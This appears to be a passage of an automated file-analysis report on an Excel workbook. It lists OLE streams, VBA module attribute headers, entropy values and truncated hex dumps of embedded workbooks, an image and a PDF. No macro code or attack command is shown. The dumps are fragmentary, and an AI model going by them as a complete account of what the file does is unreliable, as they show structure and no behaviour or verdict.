                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ V L . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                                                                                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5e 56 b7 4c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      Attribute VB_Name = "Sheet3"
                                                                                                                                                                                      Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                                                      Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                      Attribute VB_Creatable = False
                                                                                                                                                                                      Attribute VB_PredeclaredId = True
                                                                                                                                                                                      Attribute VB_Exposed = True
                                                                                                                                                                                      Attribute VB_TemplateDerived = False
                                                                                                                                                                                      Attribute VB_Customizable = True
                                                                                                                                                                                      

                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                                                                                                                      VBA File Name:ThisWorkbook.cls
                                                                                                                                                                                      Stream Size:985
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ V . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                                                                                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 5e 56 f2 89 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      Attribute VB_Name = "ThisWorkbook"
                                                                                                                                                                                      Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                                                      Attribute VB_GlobalNameSpace = False
                                                                                                                                                                                      Attribute VB_Creatable = False
                                                                                                                                                                                      Attribute VB_PredeclaredId = True
                                                                                                                                                                                      Attribute VB_Exposed = True
                                                                                                                                                                                      Attribute VB_TemplateDerived = False
                                                                                                                                                                                      Attribute VB_Customizable = True
                                                                                                                                                                                      

                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:\x1CompObj
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:114
                                                                                                                                                                                      Entropy:4.25248375192737
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:244
                                                                                                                                                                                      Entropy:2.889430592781307
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:200
                                                                                                                                                                                      Entropy:3.2920681057018664
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . m W . . . . . . . . . .
                                                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/\x1CompObj
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:114
                                                                                                                                                                                      Entropy:4.25248375192737
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/\x5DocumentSummaryInformation
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:244
                                                                                                                                                                                      Entropy:2.701136490257069
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/\x5SummaryInformation
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                                                                                                                      Stream Size:90976
                                                                                                                                                                                      Entropy:1.885975041684416
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . . . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
                                                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD0018D4CE/\x1Ole
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:20
                                                                                                                                                                                      Entropy:0.5689955935892812
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD0018D4CE/\x3ObjInfo
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:4
                                                                                                                                                                                      Entropy:0.8112781244591328
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:. . . .
                                                                                                                                                                                      Data Raw:00 00 03 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD0018D4CE/Contents
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                                                                                                                      Stream Size:197671
                                                                                                                                                                                      Entropy:6.989042939766534
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD002A52B4/\x1CompObj
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:114
                                                                                                                                                                                      Entropy:4.219515110876372
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD002A52B4/Package
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                                                      Stream Size:50945
                                                                                                                                                                                      Entropy:7.631071730257267
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:P K . . . . . . . . . . ! . E o . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e3 45 b7 6f 8c 01 00 00 c0 05 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD002A56E1/\x1CompObj
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:114
                                                                                                                                                                                      Entropy:4.219515110876372
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD002A56E1/Package
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:Microsoft Excel 2007+
                                                                                                                                                                                      Stream Size:31124
                                                                                                                                                                                      Entropy:7.746149934092623
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD002A5E23/\x1CompObj
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:114
                                                                                                                                                                                      Entropy:4.25248375192737
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD002A5E23/\x5DocumentSummaryInformation
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:484
                                                                                                                                                                                      Entropy:3.922883556049869
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD002A5E23/\x5SummaryInformation
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:19956
                                                                                                                                                                                      Entropy:3.056974324659501
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . . _ . . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . | & . . . . . . . . . . . . . . & . . . " W M F C . . . . .
                                                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD002A5E23/Workbook
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                      Stream Size:95624
                                                                                                                                                                                      Entropy:3.889652332882722
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q | 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD002A6130/\x1CompObj
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:94
                                                                                                                                                                                      Entropy:4.345966460061678
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD002A6130/\x1Ole
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:64
                                                                                                                                                                                      Entropy:2.935667186688699
                                                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . F . . . . ! . . . . . F e u i l 1 ! O b j e c t 1 8 4 .
                                                                                                                                                                                      Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 12 00 00 00 46 65 75 69 6c 31 21 4f 62 6a 65 63 74 20 31 38 34 00
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/MBD002A6130/CONTENTS
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:PDF document, version 1.7
                                                                                                                                                                                      Stream Size:21760
                                                                                                                                                                                      Entropy:7.954015192696893
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 2 4 0 R . > > . e n d o b j . 8 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 9 0 o b j . < < . / L e n g t h 2 . > > . s t r e a m . . q . . . e n d s t r e a m . e n d o b j . 1 0 0 o b j . < < . / L e n g t h 3 8 . / F i l t e r / F l a t e D e c o d e . > > . s t r e a m . . x + 2 7 2 3 7 U 0 . B . . s = # . 3
                                                                                                                                                                                      Data Raw:25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 32 34 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 38 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 4c 65 6e 67 74 68 20 32 0a 3e 3e 0a 73 74 72 65 61 6d 0d 0a 71 0a 0d 0a 65 6e 64 73 74 72 65 61 6d 0a 65
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE52/Workbook
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                                                      Stream Size:218908
                                                                                                                                                                                      Entropy:7.606771386739727
                                                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                                                                                                                                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                      General
                                                                                                                                                                                      Stream Path:MBD008EDE53/\x1Ole
                                                                                                                                                                                      CLSID:
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Stream Size:680
                                                                                                                                                                                      Entropy:5.264369934310309
                                                                                                                                                                                      Base64 Encoded:False
